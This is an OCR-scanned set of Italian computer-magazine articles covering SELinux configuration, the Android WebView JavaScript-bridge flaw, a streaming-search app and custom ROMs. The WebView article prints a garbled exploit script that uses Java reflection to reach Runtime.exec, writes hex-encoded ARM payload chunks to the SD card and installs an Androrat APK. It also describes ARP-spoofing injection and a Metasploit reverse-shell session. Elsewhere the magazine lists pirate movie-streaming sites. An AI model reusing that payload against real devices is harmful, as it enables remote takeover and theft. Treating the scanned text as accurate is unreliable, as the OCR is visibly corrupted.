# semanage login -a -s user_u centos 
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centos@localhost: 


[centos@localhost /]$ id -Z° 
Unconfined u:unconfined r:unconfined t:50-s0:c0.c1023 
[centos@localhost /]$ I 


® Fig. 5 * Il ruolo dell'utente centos assegnato al login 


Associa l’utente di sistema centos all’identità user_u. 

Questo comando permette la gestione delle policy di SELinux e, tra le al- 
tre cose, può essere utilizzato per conoscere l’elenco degli utenti SELinux 
e i relativi ruoli: 


# semanage user -1 


Utilizzando invece il parametro login, è possibile conoscere tutte le asso- 
ciazioni tra utenti di sistema e identità SELinux: 


# semanage login -1 


Sempre tramite il comando semanage è possibile definire l’utente SELi- 
nux di default da associare ai nuovi utenti di sistema: 


# semanage login -m -S targeted -s user_u -r $0 _3 
default__ 


Particolarmente utile è il comando seinfo che fornisce tutte le informa- 
zioni necessarie sulla policy in uso da SELinux. Se eseguito senza alcun 
parametro, il comando mostra i dati aggregati sui tipi, domini, regole di 
allow, boolean ecc. 


$ seinfo 


Differenti parametri possono inoltre essere utilizzati per ottenere maggiori 
informazioni. Ad esempio, se utilizzato con il parametro -u, vengono mo- 
strati gli utenti definiti dalla policy 


$ seinfo -u 
mentre il parametro -t mostra tipi e domini definiti dalla policy corrente 
$ seinfo -t 


Infine citiamo anche il comando avestat che fornisce una serie di statisti- 
che sulla cache dei vettori d'accesso. Ad esempio è possibile conoscere la 
dimensione libera della cache, il numero degli hit (decisioni che vengono 
prese esclusivamente facendo accesso alla AVC, senza ricorrere al Securi- 
ty Server) e il numero dei miss. 

$ avestat 


[root@localhost /]# avestat 
lookups hits misses allocs reclaims frees 
1016206 1007696 8510 8510 7984 8008 


[root@localhost /}# J 
® Fig. 6 * Le statistiche di AVC 
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TARGETED POLICY 


Come abbiamo già sottolineato nei paragrafi precedenti, il comportamen- 
to di SELinux viene definito da una serie di regole di sicurezza, denomi- 
nate Security Policy, che specificano quali autorizzazioni sono concesse ai 
soggetti rispetto agli oggetti. 

Le regole vengono descritte attraverso uno specifico linguaggio di con- 
figurazione e successivamente compilate e caricate nel kemel per essere 
accessibili da parte del Security Server. RedHat Enteprise Linux fornisce 
una politica di default denominata Targeted Policy, il cui binario è presente 
in /etc/selinux/targeted/policy. La versione della Targeted Policy che ab- 
biamo utilizzato per le nostre prove su un sistema CentoOS 6.3 è la nume- 
ro 24. In essa, tra le altre cose, sono state definite oltre 276 mila regole di 
allow, 9 utenti SELinux, 12 ruoli e oltre 3500 tra domini e tipi. 
Relativamente ai domini, la Targeted Policy definisce due differenti fami- 
glie: domini confinati e domini non confinati. Un processo che agisce in 
un dominio confinato è sottoposto ai rigidi controlli di SELinux, pertanto 
non può accedere alle risorse se non esplicitamente autorizzato. Come 
conseguenza, un ipotetico attaccante che abbia sfruttato una vulnerabilità 
di un processo che opera in un dominio confinato, potrà accedere ai soli 
oggetti a cui può accedere il relativo dominio, limitando i possibili danni 
che possono essere arrecati al sistema. Un processo che invece è eseguito 
in un dominio unconfined, invece, è pur sempre sottoposto ai controlli di 
SELinux, ma le regole definite nella policy non limitano alcuna azione: in 
pratica a un processo non confinato non viene impedito nulla. Le azioni di 
un eventuale attacker, in questo caso, non sono limitate. I domini non con- 
finati definiti dalla Targeted Policy sono initre_t, kernel_t e unconfined_t 
che rappresentano rispettivamente i domini dei processi di init, dei proces- 
si kernel e degli utenti interattivi. 

La policy definisce una serie di identità, quali, oltre alla già citata 
unconfined_u, anche user_u e guest_u. Ogni utente SELinux agisce in 
un dominio e a ogni dominio vengono assegnati dei privilegi che verranno 
ereditati dagli utenti Linux associati alle identità. Ad esempio, un utente 
di sistema mappato con l’utente SELinux user_u non avrà la possibilità 
(a meno di configurarlo diversamente) di eseguire le applicazioni sudo e 
su, mentre l’utente guest_u non ha la possibilità di accedere al sistema 
grafico X Window. 

Il seguente esempio rende più chiari i concetti appena descritti: supponia- 
mo che per una errata configurazione, l’amministratore del server abbia 
assegnato il permesso di scrittura al file /etc/passwd a tutti gli utenti, attra- 
verso il comando: 


# chmod 666 /etc/passwd 

In questo modo, secondo le regole DAC, tutti gli utenti possono accedere 
al file in lettura e in scrittura. Consideriamo a questo punto l’utente deno- 
minato centos, creato attraverso il comando useradd: 

# useradd centos 


di default l'utente è associato all’identità SELinux unconfined_u: 


centos@localhost $ id -Z 
unconfined_u:unconfined_r:unconfined_t:80-s0:c0-c1023 
Agendo nel contesto unconfined. i programmi lanciati dall'utente, a meno 
di differente configurazione, erediteranno tale contesto. Ad esempio pro- 
viamo ad aprire /etc/passwd con l’editor vi e, senza chiuderlo, spostiamo- 


ci in una seconda shell ed eseguiamo il comando: 


# ps -axZ | grep vi 
root :unconfined_r:unconfined_t:s0-s0:c0.c1023 68561 
tty2 S+ 0:00 vi /etc/passwd 


notiamo dall’output che il processo agisce nel dominio unconfined_t e le 
regole della policy autorizzano l’accesso ai file di tipo ete_t (che è il tipo 
associato al file passwd). 

Modifichiamo a questo punto l'identità dell’utente centos in modo da as- 
sociarlo all’utente user_u che agisce nel dominio confinato user_t: 


# semanage login -a -s user_u centos 


Eseguiamo quindi il logout dell’utente e nuovamente il login (in modo da 
ricevere la nuova identità). Verifichiamo tramite il comando id: 


$ id -Z 


user_u:user_r:user_t:s0 


Se tentiamo a questo punto di accedere al file passwd attraverso il coman- 
do vi, notiamo subito che la lettura è consentita ma la scrittura è vietata, 
nonostante le regole DAC autorizzino entrambe le operazioni. Questo per- 
ché la policy consente ai processi nel dominio user_t di accedere in lettura 
ai file aventi tipo etc_t, ma non in scrittura. 

In passato, quanto un utente desiderava modificare la target policy do- 
veva scaricare i sorgenti della policy, modificarli adeguatamente aggiun- 
gendo le regole necessarie, quindi ricompilare e caricare l’intera policy. 
Per semplificare la gestione delle modifiche e renderla meno propensa ad 
errori, RedHat ha introdotto il concetto di Modular Policy. In pratica, le 
regole locali vengono aggiunte in un modulo; ciascun modulo deve essere 
compilato e tenuto in un policy store in modo da poter essere caricato nel 
Security Server. Ogni modulo può essere caricato o scaricato indipenden- 
temente dagli altri moduli che compongono la policy. L'elenco dei moduli 
attualmente installati può essere ottenuto attraverso il comando semodule, 
un utility che permette di installare, aggiornare, elencare e rimuovere i 
moduli: 


# semodule -1 
Il numero dei moduli che compongono la security policy che abbiamo 
utilizzato dalle nostre prove è piuttosto elevato. Il comando seguente ci 


fornisce la misura esatta: 


# semodule -1 | we -1 
256 


le Edit Yiew search Terminal, Help 
[root@localhost /]# semodule -l | more 


® Fig. 7 » L'elenco (parziale) dei moduli installati su SELinux 
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PERSONALIZZAZIONE 

DEL COMPORTAMENTO DI SELINUX 

Anche se l'introduzione del concetto di policy modulare ha semplificato il 
processo di applicazione delle regole di sicurezza, scrivere un modulo è una 
operazione tutt'altro che semplice. Per questo SELinux offre agli utenti la pos- 
sibilità di personalizzare la Targeted Policy attraverso le booleane e le porte. 
Una booleana è una direttiva che può assumere — ovviamente — solo due valori. 
Attraverso l'abilitazione o la disabilitazione di una booleana viene modificato 
il comportamento di SELinux. Ad esempio, di default la targeted policy auto- 
rizza gli utenti ad utilizzare le utility ping e traceroute. Disattivando la relativa 
booleana, denominata user_ping, gli utenti perderanno il diritto di utilizzare i 
due comandi. L'attivazione e la disattivazione delle booleane avviene tramite il 
comando setsebool. Pertanto il comando 


# setsebool user ping cîf 


disattiva la booleana user_ping, infatti il tentativo di ping dell’interfaccia 
di loopback da parte di un utente che opera in un dominio confinato genera 
un'eccezione: 


$ ping localhost 
ping: icmp open socket: Permission denied 


L'elenco di tutte le booleane e i relativi valori può essere ottenuto attraver- 
so il solito comando semanage: 


# semanage boolean -1 


In alternativa, è possibile utilizzare il comando getsebool che ritorna il 
valore della booleana 


# getsebool user_ping 
user_ping --> off 


Le porte, invece, permettono di specificare il numero di porta di rete TCP e 
UDP sulla quale un processo può eseguire il bind. Di default, la Targeted Po- 
licy autorizza ciascun daemon ad accettare solo le connessioni TCP e UDP 
sulle porte standard. Di conseguenza, l’utilizzo di una porta differente deve 
essere esplicitamente autorizzato. Anziché scrivere una regola che autorizzi 
l'operazione, il comando semanage permette di definire le porte sulle quali un 
processo può eseguire il bind e il listen. Ad esempio, il server LDAP di default 
accetta le connessioni sulla porta TCP 389 (per la connessione in chiaro) e 636 
(per la connessione cifrata). L'utilizzo di una porta differente è pertanto vietata. 
Il comando 


# semanage port -a -t ldap_port -p tcp 3389 


associa la porta tcp 3389 al tipo Idap_port_t il quale, tramite la policy, 
dovrebbe essere accessibile al dominio su cui agisce il demone Idapd. 


CONCLUSIONI 


Sebbene quanto abbiamo mostrato nei paragrafi precedenti possa sem- 
brare parecchio e, senza dubbio, complesso, rappresenta solo la punta del 
grosso iceberg quale è appunto SELinux. Non perdetevi il prossimo arti- 
colo dove mostreremo come sia possibile realizzare e installare un modulo 
custom. 
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Un grave bug di sicurezza nel sistema operativo mobile di Google 
espone la maggioranza dei dispositivi che lo utilizzano ad un gra- 
vissimo rischio: qualsiasi pirata, può accedere da remoto al siste- 
ma assumendone il controllo. E con una semplice pagina HTML! 


sistemi operativi mobili sono progettati per 
vivere sul web, in particolare Android. Nel 
sistema operativo di Google, la maggior parte 
dei servizi è in realtà fornita da applicazioni web 
“mascherate” da applicativi mobili: viene sem- 


siplolter@aspiolter - 


File Edit View Sesrch Termnai Map 
af explott(handler) > explott 


Started reverse handler on 192,168,3,101:4444 
Starting the payload hand 

Sending stage (39698 bytes) to 192.163.3.107 
Netorpreter session 4 opened (192,168.3.191:4444 


etecpreter > sysinfo 
localhost 


39.4-gafesbia (arnv7l) 


java 
ete: £ > webcam list 
hi: Back Camera è 
Front Camera 
eterpreter > getuld 


server username 


funte 
«threadd 
ksofttrqd/a 
migration/s 
matchdog/0 
khelper 
suspend 
dla_mq 
Syne_supers 
bd -default 
kblockd 


B Fig.1°La shell remota di Metasploit esiste anche in ver- 
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plicemente aperto un browser che punta ad una 
pagina HTML contenente una app in Javascript. 
Un esempio banale è quello dei banner pubblici- 
tari: molte applicazioni, pur non essendo svilup- 
pate con linguaggi web, integrano una pagina html 
con la pubblicità. È per questo motivo che, nella 
programmazione di An- 
droid, uno degli oggetti 
più importanti e maggior- 
mente utilizzati è la classe 
WebView, che implemen- 
ta un browser web in mi- 
niatura. Recentemente si è 
scoperto un grave bug pro- 
prio in questo componen- 
te: la vulnerabilità consiste 
nel fatto che il codice Ja- 
vascript della pagina web 
può accedere all'oggetto 
Java “genitore”. Del bug 
sono affette tutte le ver- 
sioni di Android inferiori 
alla 4.2: sono quindi molti 
i dispositivi a rischio, con- 


siderando che diversi smartphone oggi in vendita 
utilizzano una versione di Android della serie 2.x 
(poiché la 4.x necessita di troppo risorse). Una sti- 
ma indica che i dispositivi vulnerabili sarebbero 
circa il 70% di tutti gli Android esistenti. 


GENITORI E FIGLI 


Chi non si intende di programmazione avrà ca- 
pito poco della spiegazione, fornita qualche riga 
fa in questo stesso articolo, dell'origine del bug. 
Vediamo di cominciare dall'inizio: le applicazioni 
Android sono, normalmente, dei programma Java. 
Se all'interno di un programma viene inserito un 
oggetto WebView, questo potrà leggere una pagina 
HTML ed eseguire il codice Javascript eventual- 
mente contenuto in essa. Lo script Javascript della 
pagina web è un vero e proprio programma a sé 
stante ma, pur essendo eseguito dalla WebView, 
non può interagire con essa. Si dice che WebView 
è padre della pagina web, e dunque dello script in 
essa contenuto. In pratica, l'oggetto Java WebView 
può accedere al codice Javascript, ma non può 
accadere il contrario. Quest è quello che succede 
"di solito": si è scoperto che, a causa di un bug 
di implementazione, è in realtà possibile per il 
codice Javascript risalire agli oggetti presenti nel 
programma Java. E questo con un metodo prati- 
camente identico a quello utilizzato comunemente 
da Javascript per accedere agli oggetti HTML del- 
la pagina web in cui lo script è inserito: chiaman- 
doli per nome. La cosa, in realtà, non è un grosso 
problema, almeno finchè da Javascript ci si limita 
ad accedere all'oggetto WebView che contiene lo 
script stesso e modificare sua qualche impostazio- 
ne, La situazione si fa preoccupante quando qual- 
cuno realizza un codice Javascript che cerca un 
oggetto di tipo Java.lang.Runtime. Perchè? Perchè 
questo oggetto può eseguire comandi arbitrari sul 
sistema operativo. Runtime, infatti, è la classe che 
permette il dialogo tra l'applicazione Java e l'am- 
biente circostante (cioè il sistema operativo). Tra- 
mite la funzione availableProcessors() è possibile 
sapere quanti processori sono presenti sul sistema. 
E tramite la funzione exec è possibile eseguire un 
comando di sistema. 

Per esempio, un semplice codice Javascript come 


questo: 


Permette l'esecuzione della shell e del comando 
echo (che scrive una stringa di testo in un file): tut- 
to qui! Basta inserire un codice di questo tipo in 
una pagina web e si può ottenere il controllo su un 
sistema Android (o su decine di sistemi Android, 
installando programmi per realizzare botnet). Il 
punto è: come fa un pirata a sfruttare questo bug? 
Per poter lanciare l'attacco, è necessario che l'uten- 
te visiti una pagina web contenente l'istruzione Ja- 
vascript incriminata. Il malintenzionato ha diverse 
possibilità: le più semplici consistono nel realiz- 
zare un finto banner pubblicitario, in cui inserire 
il codice e trovare il modo di inserirlo in una app, 
realizzare un sito che possa attirare l'attenzione 
degli utenti Android, oppure il man in the midd- 
le. Infatti, se il pirata si trovasse su una rete locale 
pubblica, potrebbe scegliere uno degli altri utenti 
ed eseguire un ARPspoofing. Per realizzarlo da 


una macchina GNU/Linux è sufficiente abilitare 
l'inoltro dei pacchetti di dati: 


In questo modo, si è inserito nella comunica- 
zione tra l'utente vittima ed il router. Dal mo- 
mento che, di solito, i banner pubblicitari ven- 
gono inviati tramite HTTP e non con HTTPS, la 
comunicazione sarà in chiaro. A questo punto, 
il pirata deve soltanto tenere sotto controllo il 
flusso dati con 


<script> 
function execute(cmdArgs) 


{ 


H caste ing i 


e, appena nota la richiesta di una pagina html, in- 


viare l'html con il codice Javascript incriminato: 


l'utente non si accorgerà di nulla. 


UN SEMPLICE TEST 


Questo per quanto riguarda un vero attacco. Se, 
invece, vogliamo solo un proof of concept per 
verificare se il nostro smartphone o tablet An- 
droid sia vulnerabile (in teoria, l'applicazione 
Web Browser in Android < 4.2 dovrebbe essere 
buggata ‘di serie”), possiamo sfruttare l'apposito 
modulo di Metasploit, che può essere utilizzato 


con i comandi: 


Se diamo una occhiata al modulo in questio- 
ne, vediamo subito che costruisce una pagina 


HTML: 


Il cui codice è rappresentato dalla stringa 


return xxx.getClass().forName("java.lang.Runtime").getMethod("getRuntime",n 
u E ).8 


» armBinary1 = 


B3\\xB4\\x14\1xB@\\x0B\\x20\\x08\\x0@\\x51}\ 


armBinary2="\\x1B\\xB@\\x65\\xBA\\xAD\\x23\\xC2\\x3@\\x64\\xDF\\xEE\\xA 


armBinary3=.. 
var armBinary4=.. 


var patharm = "/mnt/sdcard/Androrat 


var a=execute(["/system/bin/sh","-c","echo -n '“+armBinary1+"' 


//alert(a); 
execute([" S 
execute([" nin/sh","-c", "echo 
execute(["/s T *,"-c", "echo 


"echo -n ‘"+armBinary2+ 


'"+armBinary4+"' 


+ pathar 


+ patharm]); 
" + patharm]); 
+ patharm]); 


'"+armBinary3+"' 


"adb install /mnt/sdcard/Androrat.apk"]); 


alert( "over 
</script> 


E Fig. 2 * Tramite questo bug si possono anche installare APK sul sistema vittima 


che, in pratica, è una pagina vuota contente 
soltanto uno script. Lo script (js) è costruito 


dall'apposita funzione: 


Per prima cosa viene trovato, se esiste, l'og- 
getto Runtime. 


Poi si inserisce in una variabile il contenuto, in esa- 
decimale, del payload. Naturalmente, è necessario 
fornire a Metasploit un payload adatto ad Android 
(per esempio il reverse TCP che abbiamo sugge- 
rito). 


Successivamente si costruisce un file, sul di- 


spositivo vittima, che contenga il codice del 


payload e lo si esegue. 


La procedura viene ripetuta per tutti gli og- 
getti dell'applicazione finchè non si riesce a 
trovare l'oggetto Runtime. 


LA SOLUZIONE 


Il problema non è così semplice da risolvere: 
la soluzione più banale consiste nell'aggior- 
nare la versione di Android alla 4.4. Il fatto è 
che molti dispositivi non possono permetter- 
si di far funzionare un sistema tanto esoso di 
risorse. In questi casi, l'utente può fare poco. 
Gli sviluppatori delle app, invece, possono 
risolvere il problema semplicemente disabi- 
litando Javascript a meno che non sia asso- 
lutamente necessario. Per esempio, in una 
app che mostra banner pubblicitari in una 
WebView, Javascript non è fondamentale. 


®& 


MIce: 


FILM ON DEMAND 
SULLO SMARTPHONE 


Con uno smartphone e una TV di ultima generazione trasformiamo casa in un cinema 


per visioni in HD. Ecco come 


FS streaming video dal Web è ormai diventato un vero e proprio feno- 
meno di massa: il successo di portali come YouTube e Vimeo è lì a 
dimostrarlo! Sempre più spesso, però, scandagliamo la Rete alla ricerca 
di siti che trasmettono on-line interi film e non semplici video più o meno 
amatoriali o spezzoni di trasmissioni televisive. Il problema è che questi 
link, a volte, hanno tempi di vita brevissimi e ogni volta dobbiamo cercarne 
uno nuovo funzionante. Una ricerca su Google non sempre fornisce buoni 
risultati, ma se ci facciamo dare una mano da Android potremmo trovare 


molto più facilmente quello che cerchiamo! Grazie all’app PowerSearch, 
infatti. avremo a portata di dita un motore di ricerca molto speciale: se 
configurata nel modo giusto, inserendo il titolo del film fornirà immedia- 
tamente i link diretti allo streaming! Ma non è finita qui perché grazie alle 
tecnologie proprie degli smartphone Android potremo far interagire il cel- 
lulare con la TV e goderci il film seduti sul divano con bibita e popcorn! Il 
tutto in pochi e mirati tap sullo smartphone che abbiamo al nostro fianco! 
Non è un modo fantastico per passare una serata di assoluto relax? 


PowerSearch: film e serie tv in un touch! 


Installazione e utilizzo dell’incredibile app capace di tirar fuori dal Web i migliori contenui multimediali 


Film 


WIZARD 


PSEARCH 


http://www.rapidvideo.tv/ 
www.putlocker.com/file/ 
www.topvideo.cc/ 
http://videopremium.me/ 


www.nowvideo.sx/video/ 


Che.il potere sia con, 


http://www.solarmovie.so/link/ 


http://movie.mk-tube.cam/ 


videos/ 


http://www.ecostream.tv/ 


stream/ 


SCARICHIAMO L'APP 
DALLO STORE 02 


Andiamo sul GooglePlay Store 


CONFIGURIAMO 
POWERSEARCH 


Inviamoci un'e-mail con alle- 
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PARTE LO STREAMING! 
In PowerSearch basterà atti- 
vare il pulsante Power (rosso 


e digitiamo nel campo di ricerca il nome 
dell'app che vogliamo cercare e scaricare: 
PowerSearch. Una volta trovata, selezio- 
niamola dall'elenco dei risultati, tappiamo 
Installa, Accetto e attendiamo pochi istanti 
per il download e l'installazione. 
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gato il file di configurazione Film.txt che 
troviamo nella directory principale del 
Win CD/DVD-Rom. Apriamo il messaggio 
dal nostro device Android e tappiamo 
sull’allegato: ci verrà chiesto con quale 
app aprirlo: selezioniamo PowerSearch e 
confermiamo. 


spento, verde acceso) e cercare ciò che 
desideriamo: l'app mostrerà solo i link 
diretti al film o alle puntate di una serie! 
Se vogliamo possiamo lasciarci suggerire 
qualcosa dalle ricerche di altri utenti (in 
modo anonimo). 


Così trasformi il telefono Android 
in un decoder on demand 


Ecco le tre soluzioni per collegare lo smartphone al televisore Full HD di casa senza usare fastidiosi cavi. 
Grazie a PowerSearch potremo gustarci tutti i nostri film preferiti mettendo in Play dal nostro cellulare! 


SOLUZIONE 1 - DALL'APP ALLA SMART TV: BASTA UN'E-MAIL 


Uno degli aspetti migliori dell’applicazione PowerSearch 
è la possibilità di condividere i risultati di una ricerca e di 


inviarli come allegati di posta elettronica ai nostri contatti. 
* Selezioniamo il link che ci interessa e tappiamo 
l'apposita icona a forma di lettera della posta. Oppure, 
usiamo il tap lungo su link preciso per condividere solo 40 
quello. 
* Inviamo l'e-mail e apriamo il messaggio sul dispositivo 
che preferiamo, ad esempio la nostra Smart TV! 
* Come consiglio generale conviene copiare i link ottenuti 


direttamente nel corpo dell'e-mail. 


SOLUZIONE 3 - COL MIRACAST IL DISPLAY DELLO SMARTPHONE È CONDIVISO 


La soluzione usa una tecnologia che sta prendendo sempre più 
piede ed è già supportata da molti televisori recenti o utilizza- 
bile acquistando un dongle che trasformerà la TV in un Media 
Center. Consente di replicare ciò che vediamo sul display del 
device direttamente sulla TV! Precisiamo però che la tecnolo- 
gia è stata introdotta su Android dalla versione Jelly Bean 4.2. 
« Tappiamo sul telefono l'icona di condivisione schermo 
per attivare il protocollo. Facciamo la stessa cosa sulla 
TV e selezioniamo il nostro device Android. 
* Infine, daldevice stesso scegliamo la TV come dispositivo 
cui collegarsi. 
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MODDARE IL TABLET! 


Una delle caratteristiche che distinguono il sistema operativo Android di Google da i0S e 
Windows è la sua natura open source. Vediamo quali vantaggi comporta 


hi non avesse ancora familiarità col termine, sappia che un software 

open source (traducibile letteralmente in codice sorgente aperto), 
oltre ad essere gratuito è caratterizzato dal fatto che le righe di codice del 
programma vengono distribuite pubblicamente in Rete: qualunque pro- 
grammatore può pertanto metterci sopra le mani modificando il software 
a proprio piacimento e rilasciando delle versioni appunto “moddate” (ita- 
lianizzazione del termine inglese modding, che originariamente si rife- 
riva alla pratica di modificare le automobili per migliorarne l'aspetto o 
aumentarne le prestazioni). Di contro, il software “commerciale”, quale 
10 di Apple o Windows di Microsoft, non può in alcun modo essere mo- 
dificato, pertanto ci si deve accontentare dell’unica versione disponibile, 
quella progettata dalla software house che ne custodisce gelosamente il 
codice. In ragione di questa profonda differenza tra il sistema operativo 
di Google e quello dei suoi “competitor”, la sezione MODDING di que- 
sta guida tratterà solo i tablet Android in quanto unici a poter disporre di 
versioni del sistema operativo modificate meglio conosciute come CU- 
STOM ROM. 


ATA 


® Fig. 1 » Tra le custom ROM più popolari c'è la CyvanogenMod 
(www.cyanogenmod.org), una versione alternativa di Android 
creata da Steve Kondik (in arte Cyanogen]) che, grazie ad una 
numerosissima community di sviluppatori, supporta oggi un vasto 
numero di dispositivi. 


TUTTE LE FACCE DI ANDROID 


La domanda, a questo punto, nasce spontanea: perché installare una ver- 
sione di Android diversa da quella “stock” (stock è il termine che iden- 
tifica il software in dotazione col prodotto)? Una delle motivazioni per 
la quale molti utenti scelgono delle custom ROM è legata al fatto che le 
versioni di Android personalizzate dai principali produttori di dispositi- 
vi contengono spesso inutili “orpelli” se non vere c proprie limitazioni: 
come ad esempio l'impossibilità di fare il tethering che, pur essendo una 
funzione nativa di Android che permette di condividere l’accesso a Inter- 
net con altri dispositivi, può essere inibita per ragioni spesso di carattere 
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commerciale. Una custom ROM, al contrario, oltre a non imporre limi- 
tazioni sulle funzioni native, non contiene alcun “bloatware” (software 
gonfiato) che spesso impiega inutilmente spazio e risorse del dispositivo. 


M Fig. 2 è Produttori e operatori telefonici integrano spesso 

nei propri dispositivi app proprietarie che non è possibile 
disinstallare. Il termine con il quale vengono definite è 
“bloatware”. Esempi sono l'app store proprietario di Samsung o 
l'Area Clienti 3 che troviamo in tutti i terminali a brand Tre. 


TUTTI GLI AGGIORNAMENTI 
CHE SERVONO 


Se la necessità di avere un sistema più pulito e libero da limitazioni è una 
delle motivazioni principali per le quali si preferisce una custom ROM 
al software stock del tablet, sicuramente anche lo spettro dell’interruzio- 
ne degli aggiornamenti da parte dei produttori è la concausa che spinge 
molti ad entrare nel mondo delle ROM cucinate; è affare piuttosto noto 
che, trascorso un certo lasso di tempo, per ragioni spesso non legate ai 
soli limiti hardware i produttori interrompano l’aggiornamento dei loro 
dispositivi più datati. Con l’installazione di una custom ROM (a patto 
che quest’ultima supporti il nostro dispositivo) si potrà sempre godere 
dell’ultima versione di Android anche se il produttore ha interrotto gli 
aggiornamenti “anni addietro”. Tutte le ROM “cucinate” possono quindi 
sostituire quella di fabbrica, anche se per alcune di queste bisogna dotarsi 
anche del pacchetto di applicazioni Google (Gmail, Maps, Play Store 
ecc.) che varia a seconda della ROM che scegliamo. Come mai gli svi- 
luppatori di custom ROM non integrano anche le applicazioni Google nei 
loro pacchetti? La ragione sta nel fatto che se Android è un sistema ope- 
rativo open source e quindi libero, lo stesso non si può dire delle applica- 
zioni sviluppate nei laboratori di Mountain View: pertanto, il fatto di non 
integrare le cosiddette GApps è un obbligo imprescindibile per via delle 
licenze d’uso che almeno formalmente vanno rispettate. Ad ogni modo 
trovare le Google Apps per la propria custom ROM non è come scaricare 
un programma illegalmente: Google è molto tollerante sulla questione 


“licenze” per le sue Gapps tanto che tutte le ROM, come ad esempio 
la CyanogenMod (http://wiki.cyanogenmod.org/w/Google_Apps), fanno 
riferimento a pacchetti che è facile trovare con una semplice ricerca in 
rete. Dopo la doverosa premessa è bene tener presente che i produttori di 
dispositivi Android non permettono con facilità di modificare il sistema 
operativo del terminale, tanto che questa azione spesso ne invalida la ga- 
ranzia. Fermo restando che il procedimento che d’ora in avanti espliche- 
remo deve essere consapevole e ragionato, una volta cambiato il sistema 
operativo si può sempre tornare al firmware originale. Tuttavia il pro- 
duttore sarà in grado di “vedere” che abbiamo precedentemente “mod- 
dato” il nostro tablet... quindi in realtà quello che faremo è un viaggio 
di sola andata. Confidiamo comunque che i nostri lettori comprendano 
che i vantaggi di installare una custom ROM superano di gran lunga i 
problemi che ne derivano (sempre che questi siano così rilevanti): se poi 
sono passati due anni dal nostro acquisto, la garanzia è scaduta e quindi 
il problema non sussiste. 


PLAY STORE PER TUTTI 
Così come le ROM “cucinate”, non tutti i tablet Android integra- 
no le Google Apps, soprattutto quelli di fascia economica come 
il Mediacom SmartPad 750 S2 3G che sono poi tra i più venduti. 
Il motivo è sempre lo stesso: le licenze d'uso delle GApps! In 
particolare, in questi dispositivi non è preinstallate l'app per 

il Play Store: una mancanza abbastanza grave perché di fatto 
impedisce di installare tutte le applicazioni presenti sul market 
di Google. Non si tratta, comunque, di un problema partico- 
larmente grave: per aggiungerlo alla lista delle applicazioni è 
infatti sufficiente effettuare una ricerca su Google per trovare 
il relativo file APK compatibile con il nostro tablet, scaricarlo, 
trasferirlo sulla memoria del dispositivo e installarlo. 


LE MIGLIORI CUSTOM ROM 


Ecco le più interessanti versioni non ufficiali di Android per avventurarci nel modding del nostro tablet. 


CyanogenMod 


Disponibile per oltre sessanta modelli di cellulari e tablet 
Android, offre il supporto nativo per i temi (T-Mobile Theme 
Engine], un codec per il Free Lossless Audio Codec (FLAC), la 
cache compressa lac) un'estesa lista di APN, un client 
OpenVPN, un menu di reboot, il supporto per Wi-Fi, Bluetooth e 
tethering USB, miglioramenti allo schedulatore del keel e profili 
di overclock. 


www.Cyanogenmod.org 


Si pronuncia Me You | {Me Te lo) ed è la custom ROM che 

più si è allontanata in termini di interfaccia dal mondo Android e 
che ha fatto di questa caratteristica il suo punto 

di forza. Il successo di questa ROM è stato tale che Xiaomi 
(praduttare della ROM] ha persino prodotto un suo 

dispositivo, il MIUI Phone. 


http://en.miui.com 


PAC-man 


Una nuova famiglia di custom ROM che ha raggiunto un notevole 
successo grazie alla scelta di concentrare in un'unica versione 
non ufficiale di Android tutte le migliori caratteristiche presenti in 
altri progetti quali CyanogenMod, AOKP e ParanoidAndroid. 


Www.pac-rom.com 


SLIM 


È una ROM AOSP il che significa che si tratta di Android “puro”. 
Integra inoltre alcuni moduli di CyanogenMod e AOKP (Android 
Open Kang Project). Garantisce quindi l’esperienza d'uso pensata 
da Google offrendo notevoli miglioramenti elaborati dalla comu- 
nità degli sviluppatori. La ROM è completamente in italiano ed è 
molto leggera, sia in termini di spazio di memoria occupato, sia di 
RAM libera all'avvio del sistema. 


www.slimroms.net 


Carbon 


Basata anche questa sulla CyanogenMod e quindi sulla versione 
stock di Android 4.3. Tra le varie caratteristiche, Animations 
consente di personalizzare le animazioni delle pagine, mentre 
Interface consente di variare la densità del display, personalizzare 
Î tasti del dispositivo, scegliere la trasparenza della status bar 

e della nav bar. Lockscreen, infine, consente di scegliere come 
personalizzare la schermata di blocco e i widget. 


http://carbon-rom.com 


Paranoid 


Anche questa è una custom ROM AOSP, quindi basata sulla ver- 
sione pulita’ di Android così come rilasciata da Google. L'ultima 
release, in particolare, integra il nuovo Android 4.4.1 KitKat e 
2222 corregge molti bug segnalati direttamente dagli utenti. 
http://en.miui.com 


AOKP 


Una particolare ROM AOSP (Android Open Source Project, il 

codice originale Android) che, però, a discrezione del team Kang 

che la sviluppa, può presentare notevoli miglioramenti dal punto 

Ù Li Ar e funzionale. L'ultima versione è basata su 
ndroid 4.2.2. 


http://aokp.co 


OMNIROM 


Non sarà popolare come la CyanogenMod o l'AOKP ma ha saputo 
farsi apprezzare per alcune funzionalità esclusive, come il Multi- 
Window. Garantisce aggiornamenti tramite OTA, una maggiore 
personalizzazione grafica e nuove funzioni per la sicurezza tramite 
PIN, NFC e Posizione geografica 


http://omnirom.org. 
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Po ce, A: 


L’UTENTE ROOT PER IL NOSTRO TABLET! 


Ecco come sbloccare un dispositivo Android per accedere a tutte le sue funzioni di amministrazioni 


e configurarlo come meglio crediamo 


opo aver parlato di custom ROM occorre chiarire il significato di root, 
Dj che in inglese vuol dire radice. Proprio come per le radici di un 
albero che alimentano e sostengono l’intero fusto, con i permessi di root otte- 
niamo la facoltà di assumere il controllo totale del nostro dispositivo Android. 
Abituati a Linux, non ci sorprenderà il termine superuser (superutente) che 
sono poi gli attribuiti che il root concederà alla nostra utenza. Quindi, una volta 
ottenuto il root del nostro dispositivo possiamo fare tutto quello che prima era 
vietato, ad esempio modificare file di sistema, installare applicazioni diretta- 
mente nella SD, scegliere diversi calendari, orologi, mappe, temi, immagini da 
caricare nella schermata di avvio del dispositivo, modificare le schermate di 
blocco e soprattutto far fuori tutti i bloatware senza pietà! 


ROOT SENZA RISCHI? 


Purtroppo l'acquisizione dei permessi di amministratore su un tablet Android 
non è un’operazione totalmente priva di rischi. Teniamo presente, infatti, che 
oltre ad invalidare la garanzia, se la procedura non viene eseguita nella ma- 
niera corretta c’è il rischio di far diventare il nostro terminale l'equivalente 
di un mattone, assecondando così una metafora tanto cara agli sviluppatori: 
“bricking”. Ma veniamo alla procedura in sé che, grazie alla community di 
sviluppatori, è diventata quasi un gioco da ragazzi. Anzitutto è bene chiarire 
che ogni terminale ha il suo root: i file da utilizzare, se non la procedura stessa, 
